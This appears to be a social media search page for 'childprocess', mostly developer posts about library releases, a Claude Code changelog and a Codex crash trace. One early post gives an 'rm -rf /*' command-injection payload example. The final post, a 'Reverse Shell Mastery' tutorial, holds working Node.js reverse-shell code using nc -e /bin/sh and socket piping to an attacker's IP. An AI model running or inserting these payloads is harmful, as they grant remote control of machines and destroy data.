Filter
Exclude
Time range
-
Near
webhooks are more dangerous for endpoints and are vulnerable to lots of attacks(sqlinjection,command injection,RCE,SSRF,path transversal). eg attackers send { "cmd": "rm -rf /*" } if childprocess is used in the programming enviromnent to execute . sql injection
1
3
238
Just shipped a macOS menu bar app with NativePHP desktop myself. Hit some weird problems with ChildProcess and facades not working the same way from background processes. Wrote it all up if it's useful: hafiz.dev/blog/how-i-built-m…
1
3
95
Claude Code CLI 2.1.50 changelog: • Added support for startupTimeout configuration for LSP servers • Added WorktreeCreate and WorktreeRemove hook events, enabling custom VCS setup and teardown when agent worktree isolation creates or removes worktrees. • Fixed a bug where resumed sessions could be invisible when the working directory involved symlinks, because the session storage path was resolved at different times during startup. Also fixed session data loss on SSH disconnect by flushing session data before hooks and analytics in the graceful shutdown sequence. • Linux: Fixed native modules not loading on systems with glibc older than 2.30 (e.g., RHEL 8) • Fixed memory leak in agent teams where completed teammate tasks were never garbage collected from session state • Fixed CLAUDE_CODE_SIMPLE to fully strip down skills, session memory, custom agents, and CLAUDE.md token counting • Fixed /mcp reconnect freezing the CLI when given a server name that doesn't exist • Fixed memory leak where completed task state objects were never removed from AppState • Added support for isolation: worktree in agent definitions, allowing agents to declaratively run in isolated git worktrees. • CLAUDE_CODE_SIMPLE mode now also disables MCP tools, attachments, hooks, and CLAUDE.md file loading for a fully minimal experience. • Fixed bug where MCP tools were not discovered when tool search is enabled and a prompt is passed in as a launch argument • Improved memory usage during long sessions by clearing internal caches after compaction • Added claude agents CLI command to list all configured agents • Improved memory usage during long sessions by clearing large tool results after they have been processed • Fixed a memory leak where LSP diagnostic data was never cleaned up after delivery, causing unbounded memory growth in long sessions • Fixed a memory leak where completed task output was not freed from memory, reducing memory usage in long sessions with many tasks • Improved startup performance for headless mode (-p flag) by deferring Yoga WASM and UI component imports • Fixed prompt suggestion cache regression that reduced cache hit rates • Fixed unbounded memory growth in long sessions by capping file history snapshots • Added CLAUDE_CODE_DISABLE_1M_CONTEXT environment variable to disable 1M context window support • Opus 4.6 (fast mode) now includes the full 1M context window • VSCode: Added /extra-usage command support in VS Code sessions • Fixed memory leak where TaskOutput retained recent lines after cleanup • Fixed memory leak in CircularBuffer where cleared items were retained in the backing array • Fixed memory leak in shell command execution where ChildProcess and AbortController references were retained after cleanup Source: github.com/anthropics/claude…
1
3
13
2,406
Alright i can now finally accelerate my own workflow. This also of course can control the IDE as a childprocess. One of the biggest bottlenecks is making the AI 'see and try things' if you build UIs, so this helps a lot. Also it doesnt require a mac mini or steal my mouse.
I know everyone can do this already, but now i can too! Makepad studio has child process automation. Now i can finally have the AI test and see the UIs it makes.
2
2
465
Wanted OAuth in my @nativephp Desktop app. No package needed. Just `php -S`, a ChildProcess, and a separate Laravel instance that only exposes the routes you choose. Wrote up the approach: leuver.ink/blog/2026-02-16/o…
2
1
8
1,804
23 Dec 2025
Just released v0.6.7 of our ChildProcess component! 🎉 Just in time for the holidays, today's release introduces initial support for the PHP 8.5 release, allowing our downstream components to add compatibility for PHP 8.5 as well. github.com/reactphp/child-pr… Enjoy #async #php 🎄🎉
1
3
14
566
#LSPPDay12 Today was Node.js core APIs day Explored built-in modules like fs, path, events, os, process, and childprocess Learned how they simplify file handling, system info, event-driven code & running external tasks @lftechnology #60DaysOfLearning2025 #LearningWithLeapfrog
5
42
Sometimes @openAI codex crashes with errors like this. Posting it so maybe someone from OpenAI will see it. node:events:496 throw er; // Unhandled 'error' event ^ Error: spawn rg ENOENT at ChildProcess._handle.onexit (node:internal/child_process:286:19) at onErrorNT (node:internal/child_process:484:16) at process.processTicksAndRejections (node:internal/process/task_queues:82:21) Emitted 'error' event on ChildProcess instance at: at ChildProcess._handle.onexit (node:internal/child_process:292:12) at onErrorNT (node:internal/child_process:484:16) at process.processTicksAndRejections (node:internal/process/task_queues:82:21) { errno: -2, code: 'ENOENT', syscall: 'spawn rg', path: 'rg', spawnargs: [ 'Tomorrow' ] } Node.js v20.11.0
3
1
4
277
1 Jan 2025
New year, new release! Just released v0.6.6 of our ChildProcess component! 🎉 Today's release introduces initial support for the PHP 8.4 release, also allowing our downstream components to add compatibility for PHP 8.4 as well. github.com/reactphp/child-pr… Enjoy #async #php! 🍻
1
3
17
855
bolt. new で electron のアプリ簡単に作れるからあとは Python を ChildProcess で問題なく操れれば AI 自動化関連のかなり色んなものを作れる
1
254
12 Nov 2024
s3d::ChildProcess を強化。例えば Python がインストールされている環境でこういうことができるように。 #Siv3D (v0.8)
2
30
2,024
25 Oct 2024
Working on a Cloud-Ide project the editor section looks like this . The terminal is built using xterm and for communication with backend using childprocess will be sharing the full app early @piyushgarg_dev
2
1
33
2,096
27 Aug 2024
Siv3DでCloud Vision APIを使う実験。google-cloud-cppを直接組み込みたかったけどMSVCでのビルドが難しすぎて諦めた。代わりにAPIを呼び出す部分はC#で実装して、Siv3DからChildProcessに画像のパスを渡して標準出力で結果を受け取るようにしたら簡単だった
1
5
1,018
What an achievement! @ReactPHP's ChildProcess component has hit 10 million downloads and quite some incredible growth lately! Ready to take off? 📈🚀😃 #async #php
4
6
47
4,527
So this is the easiest way to verify that the spawn() of NodeJS ChildProcess is not asynchronous on your own Linux PC.
10
761
10 Apr 2024
See that second tab to the left of my SDXL UI in a tab, this is a child-process-second-window on a second texture. So i can now open multiple windows in the childprocess that appear as tabs in the IDE. Need that for UI designer.
2
1
10
758
29 Mar 2024
Replying to @p_matula
This is one of the most wanted features for epm… it still needs some improvements (ttl adjustment, creating a permanent rule from it, blocking childprocess from elevation) but yeah this one kicks ass and chews bublegum ;p, right @DeviceDeploy :)
1
184
This means the childprocess (5 ) gem is now perfectly compatible on all Rubies, including TruffleRuby! (the previous backends had various issues: github.com/oracle/trufflerub…)

Woot, my PR to replace childprocess many backends by pure-Ruby Process.spawn has been finally merged: github.com/enkessler/childpr… 2000 lines less, no more calling low-level C, and it should be fully compatible! Thank you @shanedasilva for taking maintenance of this gem! #Ruby #OSS
8
634
Woot, my PR to replace childprocess many backends by pure-Ruby Process.spawn has been finally merged: github.com/enkessler/childpr… 2000 lines less, no more calling low-level C, and it should be fully compatible! Thank you @shanedasilva for taking maintenance of this gem! #Ruby #OSS
3
2
34
2,790
25 Dec 2023
PART 3 ⤵️ 🍏 Reverse Shell Mastery In our thrilling finale, we explored elevating Node.js security by obtaining a reverse shell using child_process & Ncat modules. Let's recap and dive into reverse shell mastery! 🛡️🚀 🔰 1. ChildProcess Module: A crucial player in Node.js multitasking, enabling the execution of external commands. Perfect for our reverse shell strategy! 💻 Code: const { exec } = require('child_process'); exec('nc -e /bin/sh YOUR_IP YOUR_PORT'); 🔰 2. Ncat Module - Networking Prowess: Utilize Ncat to establish a secure connection between the attacker and the target system. A quick reverse shell can be obtained with various commands within the exec method itself. Code: const net = require('net'); const client = new net.Socket(); client.connect(YOUR_PORT, YOUR_IP, () => { // Connection established; you're in control now! }); 🔰 Reverse Shell Payload with exec(): Achieve a secure reverse shell and handle errors and command output effectively. Code: const { exec } = require('child_process'); const net = require('net'); const client = new net.Socket(); client.connect(YOUR_PORT, YOUR_IP, () => { // Connection established; you're in control now! const shell = exec('nc -e /bin/sh', (error, stdout, stderr) => { if (error) { // Handle errors } // Process command output (stdout) }); // Forward the shell's output to the network socket shell.stdout.pipe(client); shell.stderr.pipe(client); client.pipe(shell.stdin); }); 🔰 3. Using execSync() for Command Execution: Synchronously execute commands, capturing output - ideal for our reverse shell payload. Code: const { execSync } = require('child_process'); // Replace 'YOUR_IP' and 'YOUR_PORT' with your values const reverseShellCommand = `nc -e /bin/sh YOUR_IP YOUR_PORT`; // Execute the command synchronously const result = execSync(reverseShellCommand); // Process the result as needed console.log(result.toString('utf8')); 👁‍🗨 Recap: 1️⃣ Global Processes: Unleash Node.js processes for better control. 2️⃣ File System Exploits: Dive into 'fs' and 'readdir()' for reconnaissance and targeted file access. 3️⃣ Reverse Shell Mastery: Achieve a secure reverse shell using child_process.execSync() and networking modules. Loved it? Let's keep this momentum going! 🚀 Ask your Doubt In Comment BoX
20
78
6,635